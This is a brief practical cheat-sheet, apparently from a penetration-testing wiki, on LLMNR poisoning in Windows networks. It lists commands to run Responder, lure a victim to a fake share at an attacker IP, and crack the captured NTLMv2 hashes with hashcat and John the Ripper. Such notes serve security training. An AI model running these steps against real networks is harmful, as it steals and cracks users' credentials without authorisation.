LLMNR Poisoning

Practical

Capture NTLMv2 Hash

Start Responder

sudo responder -I eth0
Responder

Note: You have to request for an non existent share in the victim machine

\\<Attacker IP>\FakeShare

Captured Hash

Crack NTLMv2 Hash

Hashcat

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Hashcat

John

john --wordlist=<wordlist.txt> hash.txt
John The Ripper
PreviousGroup Policy PreferencesNextLDAP (Post)

Last updated

Was this helpful?